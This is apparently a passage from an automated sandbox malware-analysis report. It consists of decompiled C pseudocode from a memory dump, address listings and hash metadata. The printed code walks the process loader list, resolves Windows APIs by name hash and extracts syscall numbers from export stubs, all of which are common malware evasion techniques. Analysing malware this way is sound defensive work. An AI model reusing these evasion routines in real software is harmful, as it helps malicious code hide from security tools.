										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6e8f9377
0x6e8f937b
0x6e8f9387
0x6e8f938b
0x6e8f938f
0x6e8f9394
0x6e8f9397
0x6e8f9399
0x6e8f939b
0x6e8f939b
0x6e8f939e
0x6e8f93a4
0x6e8f941c
0x6e8f9420
0x6e8f9423
0x6e8f9423
0x6e8f9426
0x00000000
0x6e8f9426
0x6e8f93ab
0x6e8f9413
0x6e8f9417
0x00000000
0x6e8f9417
0x6e8f93b2
0x6e8f940b
0x6e8f940e
0x00000000
0x6e8f940e
0x6e8f93b7
0x6e8f93f5
0x6e8f93fc
0x6e8f93ff
0x6e8f93c8
0x6e8f93c8
0x6e8f93ce
0x00000000
0x00000000
0x6e8f93d3
0x6e8f93ed
0x6e8f93f0
0x00000000
0x6e8f93f0
0x6e8f93d8
0x00000000
0x6e8f93da
0x6e8f93de
0x6e8f93e1
0x00000000
0x6e8f93e1
0x6e8f93d8
0x6e8f9429
0x6e8f9429
0x6e8f9429
0x6e8f9432
0x6e8f943b
0x6e8f943e
0x6e8f9441
0x6e8f9444
0x6e8f9447
0x6e8f944d
0x6e8f948f
0x6e8f9492
0x6e8f9493
0x6e8f949a
0x6e8f949d
0x6e8f944f
0x6e8f9453
0x6e8f945d
0x6e8f9464
0x6e8f9466
0x6e8f947f
0x6e8f9482
0x6e8f9482
0x6e8f9464
0x6e8f94a5
0x6e8f94a8
0x6e8f94ab
0x6e8f94af
0x6e8f94b3
0x6e8f94bd
0x6e8f94c1
0x6e8f94cb
0x6e8f94d4
0x6e8f94e1
0x6e8f94e4
0x6e8f94e7
0x6e8f94e7
0x6e8f94f3
0x6e8f94fe
0x6e8f9504
0x6e8f9508
0x6e8f94f5
0x6e8f94f5
0x6e8f94f5
0x6e8f9510
0x6e8f953a
0x6e8f9540
0x6e8f9540
0x6e8f9548
0x6e8f98f1
0x6e8f98f7
0x6e8f98fd
0x6e8f98fd
0x00000000
0x6e8f954e
0x6e8f954e
0x6e8f9552
0x6e8f9555
0x6e8f9558
0x6e8f955b
0x6e8f955f
0x6e8f9561
0x6e8f9564
0x6e8f9567
0x6e8f956b
0x6e8f9570
0x6e8f9573
0x6e8f9577
0x6e8f957c
0x6e8f957f
0x6e8f9581
0x6e8f9584
0x6e8f9588
0x6e8f958d
0x6e8f959d
0x6e8f95a3
0x6e8f95a3
0x6e8f95ab
0x6e8f95ad
0x6e8f95b6
0x6e8f95b8
0x6e8f95bb
0x6e8f95c6
0x6e8f95f3
0x6e8f95c8
0x6e8f95df
0x6e8f95df
0x6e8f95fb
0x6e8f9601
0x6e8f9607
0x6e8f9607
0x6e8f95fb
0x6e8f95b6
0x6e8f960e
0x6e8f967f
0x6e8f9684
0x6e8f96dd
0x6e8f979f
0x6e8f97a4
0x6e8f97b3
0x6e8f97b9
0x6e8f97bd
0x6e8f97c6
0x6e8f97cd
0x6e8f97d6
0x6e8f97e4
0x6e8f97e7
0x6e8f97cf
0x6e8f97cf
0x6e8f97cf
0x6e8f97cd
0x6e8f97f0
0x6e8f981d
0x6e8f9830
0x6e8f9838
0x6e8f981f
0x6e8f9821
0x6e8f9829
0x6e8f9829
0x6e8f97f2
0x6e8f97f7
0x6e8f9816
0x6e8f97f9
0x6e8f97fe
0x6e8f980f
0x6e8f9800
0x6e8f9800
0x6e8f9800
0x6e8f97fe
0x6e8f97f7
0x6e8f9840
0x6e8f984f
0x6e8f985c
0x6e8f9865
0x6e8f9869
0x6e8f986d
0x6e8f9870
0x6e8f9873
0x6e8f9876
0x6e8f9879
0x6e8f987c
0x6e8f9882
0x6e8f9886
0x6e8f988c
0x6e8f988c
0x6e8f9882
0x6e8f9892
0x6e8f98cf
0x6e8f98d3
0x6e8f98da
0x6e8f98e0
0x6e8f9894
0x6e8f9897
0x6e8f98b7
0x6e8f98bb
0x6e8f98c2
0x6e8f98c9
0x6e8f9899
0x6e8f989c
0x6e8f989e
0x6e8f98a2
0x6e8f98ac
0x6e8f98b2
0x6e8f98b2
0x6e8f989c
0x6e8f9897
0x6e8f98e7
0x6e8f98e7
0x6e8f9900
0x6e8f9900
0x6e8f9906
0x6e8f990b
0x6e8f9965
0x6e8f996a
0x6e8f99a9
0x6e8f99ae
0x6e8f99b0
0x6e8f99b4
0x6e8f99b7
0x6e8f99ba
0x6e8f99bc
0x6e8f99bd
0x6e8f99bd
0x6e8f99c2
0x6e8f99e0
0x6e8f99e2
0x6e8f99e6
0x6e8f99ec
0x6e8f99ef
0x6e8f99f1
0x6e8f99f2
0x6e8f99f2
0x00000000
0x6e8f99c4
0x6e8f99c4
0x6e8f99c4
0x6e8f99c8
0x6e8f99ce
0x6e8f99d1
0x6e8f99d3
0x6e8f99d6
0x6e8f99f5
0x6e8f99f5
0x6e8f99fc
0x6e8f9a16
0x6e8f99fe
0x6e8f99fe
0x6e8f9a0a
0x6e8f9a0b
0x6e8f9a0e
0x6e8f9a0e
0x6e8f9a24
0x6e8f9a24
0x6e8f99c2
0x6e8f996f
0x6e8f997d
0x6e8f9995
0x6e8f9999
0x6e8f999c
0x6e8f99a2
0x6e8f99a6
0x6e8f99a6
0x00000000
0x6e8f99a6
0x6e8f997f
0x6e8f9983
0x6e8f9989
0x6e8f9989
0x6e8f998f
0x00000000
0x6e8f998f
0x6e8f9971
0x6e8f9975
0x00000000
0x6e8f9975
0x6e8f990f
0x6e8f993b
0x6e8f9953
0x6e8f9957
0x6e8f995a
0x6e8f995d
0x6e8f995f
0x6e8f9962
0x6e8f993d
0x6e8f993d
0x6e8f9941
0x6e8f9944
0x6e8f9947
0x6e8f994a
0x6e8f994d
0x6e8f994d
0x00000000
0x6e8f993b
0x6e8f9915
0x00000000
0x00000000
0x6e8f991b
0x6e8f991f
0x6e8f9925
0x6e8f9928
0x6e8f992b
0x6e8f992e
0x00000000
0x6e8f992e
0x6e8f97a6
0x6e8f97aa
0x6e8f97b0
0x00000000
0x6e8f97b0
0x6e8f96e8
0x6e8f96fa
0x6e8f96ff
0x6e8f976a
0x00000000
0x00000000
0x6e8f9771
0x6e8f9797
0x6e8f979b
0x00000000
0x00000000
0x6e8f977a
0x6e8f977f
0x6e8f9793
0x00000000
0x00000000
0x00000000
0x6e8f9795
0x6e8f9786
0x00000000
0x00000000
0x6e8f978b
0x00000000
0x00000000
0x6e8f978d
0x00000000
0x6e8f9771
0x6e8f9701
0x6e8f970b
0x6e8f971c
0x6e8f971f
0x6e8f9722
0x6e8f9728
0x00000000
0x00000000
0x00000000
0x00000000
0x6e8f972e
0x6e8f972e
0x6e8f972e
0x6e8f9735
0x00000000
0x00000000
0x6e8f9737
0x6e8f973a
0x6e8f9740
0x00000000
0x00000000
0x00000000
0x6e8f9742
0x6e8f9744
0x6e8f974d
0x00000000
0x00000000
0x6e8f9761
0x00000000
0x00000000
0x00000000
0x6e8f9763
0x6e8f96ef
0x00000000
0x00000000
0x00000000
0x6e8f96f5
0x6e8f9689
0x6e8f96b8
0x6e8f96b9
0x6e8f96c2
0x00000000
0x6e8f96d3
0x00000000
0x6e8f96d3
0x6e8f9690
0x6e8f9693
0x6e8f96a6
0x6e8f96a7
0x6e8f96ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e8f9693
0x6e8f9689
0x6e8f9615
0x6e8f9672
0x6e8f9676
0x6e8f967c
0x00000000
0x6e8f967c
0x6e8f9617
0x6e8f961b
0x6e8f9628
0x6e8f962c
0x6e8f9642
0x6e8f964a
0x6e8f962e
0x6e8f9630
0x6e8f963a
0x6e8f963a
0x6e8f9650
0x6e8f9659
0x6e8f9670
0x00000000
0x00000000
0x00000000
0x6e8f9670
0x6e8f965b
0x6e8f965b
0x00000000
0x6e8f9650

Strings

, xrefs: 6E8F99DB

Memory Dump Source

Source File: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: true

Associated: 00000000.00000002.650867188.000000006E8E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.650992974.000000006E8FA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.651027669.000000006E8FD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: 99af602198f7c1aab78415c99d612ab853ab7faa4a4c7ac937c7ecaeb3bd70ba
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: 0C22A03180839ACBD754CED9C4A136ABBE0BF86340F008C6DE9E55B2D5D335D986CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E8F143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6E8F143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6E8F0304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6e8fd208 == 0 ||  *0x6e8fd2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6E8F4FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6e8fd2f0 |  *0x6e8fd2f1;
									if(( *0x6e8fd2f0 |  *0x6e8fd2f1) == 0) {
										_t525 =  *0x6e8fd208; // 0x2c71340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6e8fd2f0 = 1;
											_t526 = E6E8F361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6E8F1C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6e8fd208 = _t526;
											 *0x6e8fd2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6E8F361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6E8F1C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6E8EDFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6E8EDFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6e8fd20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6e8fd210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6E8EE8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6E8F306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6e8fd2e4 = 1;
					E6E8EF584( &(_t535[0x38]), 0);
					E6E8EF584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6E8EF4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6E8F306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6E8EF828( &(_t535[0xc]), E6E8EF4CC( &(_t535[8])) + 0x14);
								_t369 = E6E8EF4BC( &(_t535[0xc]), E6E8EF4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6E8EF654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6E8EF584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6E8EF654( &(_t535[8]));
							E6E8EF654( &(_t535[0x164]));
							E6E8EF584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6E8EF584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6E8F1D34(0x60a28c5c);
							_t290 = E6E8F12EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6E8F1C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6E8ED014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6E8F5CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6E8F5D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6E8F8E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6E8EF654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6E8EBB44( &(_t535[0x110]));
							}
							E6E8ECFDC( &(_t535[0x104]));
							E6E8ECFDC(_t518);
							E6E8ECFDC( &(_t535[0x15c]));
							E6E8ECFDC( &(_t535[0x154]));
							E6E8F90EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6E8EF618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6E8F90B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6E8EF4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6E8EF4CC( &(_t535[0x44]));
								_t519 =  *(0x6e8fbd40 + _t381 * 4);
								_t531 = E6E8F907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6E8F87E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6E8EF4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6E8EF4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6E8EF4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6E8EF828( &(_t535[0x20]), E6E8EF4CC( &(_t535[0x1c])) + 8);
										E6E8EF4BC( &(_t535[0x20]), E6E8EF4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6E8F317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6E8EF828( &(_t535[0x48]), _t535[0x70]);
									E6E8F317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6E8EF840( &(_t535[0x44]), _t563);
									E6E8EF840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6E8F913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6E8F9104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6E8EF654( &(_t535[0x144]));
									E6E8EF654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6e8fd2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6E8EF654( &(_t535[0x11c]));
							E6E8F8E68(_t381,  &(_t535[0xd8]));
							E6E8EF654( &(_t535[0x1c]));
							E6E8EF654( &(_t535[0x44]));
							E6E8EF654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6E8EF4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6E8EF828( &(_t535[0x38]), E6E8EF4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6E8EF4BC( &(_t535[0x38]), E6E8EF4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6E8EF4BC( &(_t535[0xc]), _t62);
						_t455 = E6E8EF4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6e8f1448
0x6e8f144f
0x6e8f1452
0x6e8f1459
0x6e8f1bdb
0x6e8f1bdb
0x6e8f145f
0x6e8f146a
0x6e8f19a9
0x6e8f19ad
0x00000000
0x6e8f1c2c
0x6e8f19b3
0x6e8f19b6
0x6e8f19b9
0x6e8f19c3
0x6e8f19d2
0x6e8f19d4
0x6e8f19db
0x6e8f1bc5
0x6e8f1bc7
0x6e8f1bca
0x6e8f1bce
0x00000000
0x6e8f1bce
0x6e8f19ea
0x6e8f19f5
0x6e8f19fc
0x6e8f19ff
0x6e8f1a01
0x6e8f1a04
0x6e8f1a07
0x6e8f1a0d
0x6e8f1a1b
0x6e8f1a2b
0x6e8f1a50
0x6e8f1a61
